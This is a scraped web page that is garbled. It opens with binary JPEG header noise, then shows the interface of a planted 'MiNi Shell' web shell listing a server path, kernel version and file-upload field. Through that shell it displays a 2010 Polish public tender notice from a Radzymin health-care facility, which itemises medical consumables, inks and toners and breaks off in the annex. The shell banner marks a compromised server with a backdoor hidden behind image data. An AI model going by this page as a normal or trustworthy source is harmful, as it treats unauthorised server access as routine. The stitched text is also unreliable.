JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100819/257646-N-2010.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa materiałów medycznych sprzętu jednorazowego użytku i materiałów
opatrunkowych, tuszy i tonerów</b><br>
<b>Numer ogłoszenia: 257646 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów medycznych sprzętu jednorazowego użytku i materiałów
opatrunkowych, tuszy i tonerów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik Nr 1
FORMULARZ   CENOWY
Zadanie Nr 1 - materiały medyczne i sprzęt jednorazowego użytku 33140000-3
	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Przyrząd do przetaczania
płynów infuzyjnych typ IS	2900
szt				
2	Przyrząd do przetaczania
krwi typ TS	100 szt				
3	Przedłużacz do pompy
infuzyjnej KZ-11 jałowy,
niepirogenny, nietoksyczny.	100 szt				
4	Worki do moczu 2000 ml
nie sterylne	500 szt
				
5	Szpatułki drewniane	16000
szt				
6	Veuflon 0,8	2000 szt				
7	 Veuflon 1.0	2000 szt				
8	550 szt	150 szt				
9	Veuflon 1.4	50 szt				
10	Veuflon 1,7	50 szt
				
11	Ostrze chirurgiczne 21	300 szt				
12	Ostrze chirurgiczne 23	1000 szt				
13	Ostrze chirurgiczne 11	1000 szt				
14	Prześcieradła papierowe
rolk	100
rolek				
15	Wziernik ginekologicz.
Średni Nr M	2000
szt				
16	Pojemnik na zużyte igły 1 L	1000 szt
				
17	żel do USG 500g	120
				
18	Szkiełka do cyt.	1000 szt
				
19	Paski do gleukometru
Accu-Chek Active	30 op.
				
20	Wzierniki ginekologiczne Nr S	1000 szt				
21	Wzierniki ginekologiczne Nr L	500 szt.				
	Razem					

Zadanie  Nr 2 - materiały i sprzęt jednorazowego użytku strzykawki 33141310-6
	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Strzykawka Luer 20 ml.
plastik	9500
szt				
2	Strzykawka Luer 5 ml.
plastki	12000
szt				
3	Strzykawka Luer 10 ml.
plastyki	8500
szt				
4	Strzykawka Luer 2 ml.
plastyki	7000
szt				
5	Strzykawki insulinowe 1
ml	500 szt
				
6	Strzykawki do pompy
infuzyjnej 20ml.	250 szt
				
7	Strzykawka do pompy infuzyjnej 50 ml	20 szt.				
8	Rurka ustno-gardłowa Nr 2 	30 szt				
9	Mini - spike	100 szt				
10	Cewnik do podawania tlenu przez nos 	150 szt				
11	Żel ścierny do EKG	  10 szt				
12	Żel do EKG	10 szt				
13	Aparaty do pompy objętościowej MEDIMA  Lines S  dl. 270 cm.	80 szt.				
14	Elektrody do EKG jednorazowe Sorimex	4800 szt.				
	Razem

Zadanie  Nr 3 - sprzęt jednorazowego użytku cewniki 33141200-2
	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Cewnik Foley dwudrożny
silikonowane.Nr16	120 szt				
2	Cewnik Foley dwudrożny
silikonowane.Nr18	120 szt				
3	Cewnik Foley dwudrożny
silikonowane. Nr20	120 szt
				
4	Cewnik Foley dwudrożny
silikonowane.Nr22	120 szt
				
5	Cewnik Foley dwudrożny
silikonowane. Nr24	50 szt
				
6	Cewnik Tiemana Nr 14	10 szt				
7	Cewnik Tiemana Nr 16	10 szt				
8	Cewnik Tiemana Nr 18	10 szt				
9	Cewnik Tienana Nr 20	10 szt.				
	Razem					

Zadanie   Nr 4 - sprzęt jednorazowego użytku igły 33141320-9
	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Igła luer 0,60 x 25    23	1 0000
szt				
2	Igła luer 0,50x25 25 GA	1 0000
szt				
3	Igła luer 0,70 x 30 22G x
1 ?	5000
szt				
4	Igła luer 0,80 x 40 21G x
1 ?	10000
szt				
5	Igła luer 0,90 x 40 20G x 1
?	10000
szt				
6	Igła luer 1,1 x 40 19G x 1
?	2500
szt				
7	Igła luer 1,2 x 40 18G x 1
?	13000
szt				
8	Igła luera 0,45 x 23	1000
szt				
9	Igła luera 0,45 x 13	1000
szt					
10	Igły PENOFINE   0,33x12,7	1000 szt				
	Razem

Zadanie    Nr 5 - materiały i sprzęt jednorazowego użytku nici 33140000-3

	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Amifil nici chirurgiczne 0/0 w op. 10 szt.	10 op.				
2	Amifil nici chirurgiczne 0/1 w op. 10 szt	10 op.				
3	Amifil nici chirurgiczne 2/0 w op. 10 szt.	15 op.				
4	Amifil nici chirurgiczne 3/0 w op. 10 szt.	40  op.				
5	Amifil nici chirurgiczne 4/0 w op. 10 szt.	30 op.
				
6	Safil nici chirurgiczne podskórne 1/0   w op. 10 szt.	30 op.
				
7	Safil nici chirurgiczne
podskórne 2/0  w op. 10 szt	10 op.				
8	Safil nici chirurgiczne
podskórne 3/0   w op. 10 szt.	30 op.
				
9	Safil nici chirurgiczne
podskórne 4/0 10 szt w op.	20 op.				
	Razem					

Zadanie   Nr 6 - sprzęt jednorazowego użytku worki 33157700-2

	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Worki czerwone duże
mocne 120 l      300 szt. w op.	2100 szt.				
2	Worki czerwone małe
mocne 35 l        500  szt. w op.	3000 szt.				
						
	Razem					

Zadanie   Nr 7 - sprzęt jednorazowego użytku rękawice 33141420-0

	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Rękawice latex beztalkowe
z witaminą E rozmiar S	50000
szt				
2	Rękawice latex beztalkowe
z witaminą E rozmiar L	10000
szt				
3	Rękawice latex beztalkowe
z witaminą E rozmiar M	25000
szt				
4	Rękawice winilowe S	5000
szt				
5	Rękawice winilowe M	5000
szt				
6	Rękawice chirurg. stery. 7,5	1500
szt				
7	Rękawice chirurg. stery.
8,5	200
szt				
8	Rękawice pudrowe S 	2000
szt				
						
	Razem					

Zadanie   Nr 8 - materiały opatrunkowe 33141100-1

	Rodzaj szczepionki	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Opaska dziana 4 x 10	1500
szt				
2	Opaska dziana 4 x 15	1080
szt				
3	Opaska dziana 4 x 5	900 szt				
4	. Opaska elastyczna 4 x 10	10 szt				
5	Opaska elastyczna 4 x 15	10 szt				
6	Gaza opatrunkowa 200 x
90	1300
mb				
7	. Gaza sterylna 1 x 1 m	15 szt				
8	Gaza opatrunkowa
sterylna 1 x ? m2	80 szt				
9	Wata opatrunkowa 0,5 kg	50 kg				
10	Lignina płaty
	150 kg
				
11	Plastovis 5m x 2,5 cm	120 szt.				
12	Plastopore 5m x 2,5 cm	500 szt.				
13	Plaster Polovis 5 m x 50
mm	110 szt.				
14	Plaster Plastofix 
10 cm x 10 mb.	25 szt.
				
15	Plaster Fixopore 1 m x
6 cm	10 op
				
16	Opaski gipsowe 3x 120
mm	10 szt
				
17	Plaser omnifix E 10 cm x
10 mb.	30 szt
				
18	Plaster Omnifix C 15 cm
x 10 mb.	10 szt.
				
19	Opaska gipsowa 3x 140
mm	10 szt
				
20	Kompres bawełniany
nie jałowy 7x7 cm	5000 szt				
21	Kompres bawełniany nie
jałowy  10 x 10 cm	4000 szt
				
22	Kompres bawełniany nie
jałowy 5x5 cm	7000 szt
				
23	Canula Plast 8x 6 cm	5000 szt.				
24	Gaza sterylna 1x1/4 m	100 szt.
				
25	Codofix  Nr 4 
( siatka zabezpieczająca)	 50 op.				
26	Codofix Nr 5
( siatka zabezpieczająca)	 20 op.				
27	Codofix Nr 14
( siatka zabezpieczająca)	5 op.				
28	Codofix nr 10
( siatka zabezpieczająca)	5 op.				
29	Codofix nr 8 
( siatka zabezpieczająca)	5 op.				
30	Codofix nr 6
( siatka zabezpieczająca)	5 op.				
	Razem					

Zadanie Nr 9 - Tusze i tonery oryginały KOD CPV 22600000-6


	Rodzaj 	Ilość	Cena netto	VAT	Cena brutto	Wartość brutto
1	Toner do ksero Canon
C-EXV 14	20 szt.				
2	Toner do kserokopiarki
TOSHIBA T1 550E	3 szt				
3	Tusz HP C 6578 A	4 szt				
4	Tusz HP C 6615D	6 szt				
5	Tusz HP C6656A	25 szt				
6	Tusz HP C6657A	20 szt				
7	Tusz HP C87677EE	20 szt				
8	Tusz HP C9352A	10 szt				
9	Tusz HP C9361EE	10 szt				
10	Tusz HP C9351A	10 szt				
11	Tusz HP C9362EE	25 szt				
12	Tusz Canon CL-41	8 szt				
13	Tusz Canon PG-40	8 szt				
14	Tusz Canon BX-3	10 szt				
15	Tusz HP C 8766E	15 szt				
16	Toner HP CB436A	12 szt				
17	Toner Oki  B430/B440            na 7000 tyś stron	10 szt				
18	Toner OC 565 CY	8 szt				
19	Toner OC  565 CC	8 szt				
20	Toner OC  565 K	12 szt				
21	Toner  OC 565 M	8 szt.				
	Razem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.10-6, 33.14.12.00-2, 33.14.13.20-9, 33.15.77.00-2, 33.14.14.20-0, 33.14.11.00-1, 22.60.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany ceny na produkty będące przedmiotem umowy, w przypadku gdy w trakcie trwania umowy Wykonawca zaproponuje niższe ceny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w
Radzyminie ul. Konstytucji 3 Maja 17 pok. 214 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2010 godzina 10:30, miejsce: w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w
Radzyminie ul. Konstytucji 3 Maja 17 pok. 214 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 02.10.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - materiały medyczne i sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo okreslone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie  Nr 2 - materiały i sprzęt jednorazowego użytku strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szcegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie  Nr 3 - sprzęt jednorazowego użytku cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie   Nr 4 - sprzęt jednorazowego użytku igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo okreslone w załączniuku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nr 5 - materiały i sprzęt jednorazowego użytku nici.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo okreslone w załączniuku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nr 6 - sprzęt jednorazowego użytku worki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie   Nr 7 - sprzęt jednorazowego użytku rękawice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.12-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie   Nr 8 - materiały opatrunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</p></li>
